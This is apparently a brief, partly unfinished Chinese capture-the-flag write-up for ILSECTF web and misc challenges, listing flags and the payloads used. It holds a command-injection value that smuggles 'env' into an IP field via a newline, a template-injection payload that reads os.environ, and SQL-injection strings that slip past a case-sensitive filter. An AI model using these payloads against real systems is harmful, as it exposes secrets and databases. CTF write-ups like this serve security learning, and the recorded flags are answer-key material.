ILSECTF Web Misc

83 阅读1分钟

ping_server

使用隔断符号%0a,执行命令,发现flag不在目录下在环境变量中.

FLAG: flag{45750ab2-6184-44ed-87dd-8ba7e691b096}

payload: ip=127.0.0.1%0aenv

template_injection

SSTI漏洞,先使用fenjing找出注入点:

注入点为name

payload:name={{lipsum.globals.os.environ}}

sql

通过测试发现or select 空格被过滤了,但是只限制了小写字母

payload:
1) username=1&password=1'/**/Or/**/'1'='1'/**/Order/**/By/**/3-- (测试总共有几列,结果为3列)
2) username=1&password=1'/**/Or/**/'1'='1'/**/Union/**/Select/**/1,2,3-- (测试回显点在2处)
3) 

Interesting_web

Hidden_Evidence

FLAG: flag{sevret_secret}

图寻题目

> Flag:flag{广东省-广州市-天河区-珠江新城珠江西路-5号}